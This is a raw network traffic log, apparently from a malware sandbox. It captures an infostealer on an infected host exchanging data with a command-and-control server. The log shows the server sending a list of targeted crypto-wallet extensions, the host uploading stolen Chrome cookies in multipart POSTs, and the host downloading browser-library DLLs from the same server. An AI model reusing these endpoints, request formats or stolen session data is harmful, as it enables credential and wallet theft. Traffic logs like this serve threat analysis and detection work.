2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 4, 2024 17:37:33.072047949 CEST	224	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdk
Sep 4, 2024 17:37:33.072068930 CEST	1236	IN	Data Raw: 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 4e 76 62 43 6c 38 59 32 35 74 59 57 Data Ascii: b2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2x
Sep 4, 2024 17:37:33.072078943 CEST	224	IN	Data Raw: 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d Data Ascii: Z2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxH
Sep 4, 2024 17:37:33.072089911 CEST	1236	IN	Data Raw: 62 32 4a 35 66 47 70 75 61 32 56 73 5a 6d 46 75 61 6d 74 6c 59 57 52 76 62 6d 56 6a 59 57 4a 6c 61 47 46 73 62 57 4a 6e 63 47 5a 76 5a 47 70 74 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 72 61 6d 31 76 62 32 Data Ascii: b2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGRmZ2RoZ2JpYW1mZGZtYmlrY2RnaGlkb2FkZHwxfDB8MHxPbmVLZXl8am5tYm9iam1obG5nb2VmYWlvamZsamNraWxoaGxoY2p8MXw
Sep 4, 2024 17:37:33.072103024 CEST	1236	IN	Data Raw: 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d 68 6e 61 47 39 68 62 57 46 77 59 32 52 77 59 6d 39 6f 63 47 68 70 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 74 69 59 57 6c 38 4d 58 77 77 66 44 42 38 51 58 56 30 61 48 6c 38 5a 32 Data Ascii: fEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmh
Sep 4, 2024 17:37:33.072820902 CEST	448	IN	Data Raw: 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 78 77 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47 Data Ascii: amlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXw
Sep 4, 2024 17:37:33.072925091 CEST	1236	IN	Data Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44 Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
Sep 4, 2024 17:37:33.072982073 CEST	268	IN	Data Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57 Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
Sep 4, 2024 17:37:33.147444963 CEST	467	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHI Host: 46.8.231.109 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"fplugins------BKECAEBGHDAEBFHIEGHI--
Sep 4, 2024 17:37:33.329974890 CEST	335	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:33 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 4, 2024 17:37:33.532169104 CEST	200	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDB Host: 46.8.231.109 Content-Length: 6063 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:37:33.532229900 CEST	6063	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 4, 2024 17:37:33.863089085 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 4, 2024 17:37:33.911484957 CEST	91	OUT	GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 4, 2024 17:37:34.090480089 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:34 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 4, 2024 17:37:35.581988096 CEST	950	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCG Host: 46.8.231.109 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------KEBFHIJECFIDGDGCGHCG--
Sep 4, 2024 17:37:35.840558052 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 4, 2024 17:37:36.206820011 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGD Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file"------KKKKEHJKFCFCBFHIIDGD--
Sep 4, 2024 17:37:36.466358900 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 4, 2024 17:37:38.200891972 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFI Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="file"------FBFCGIDAKECGCBGDBAFI--
Sep 4, 2024 17:37:38.460808039 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 4, 2024 17:37:39.469331980 CEST	91	OUT	GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 4, 2024 17:37:39.647492886 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:39 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 4, 2024 17:37:41.365149975 CEST	91	OUT	GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 4, 2024 17:37:41.545948982 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:41 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 4, 2024 17:37:42.459177017 CEST	92	OUT	GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 4, 2024 17:37:42.685755968 CEST	92	OUT	GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 4, 2024 17:37:42.892771006 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:42 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 4, 2024 17:37:43.785033941 CEST	88	OUT	GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
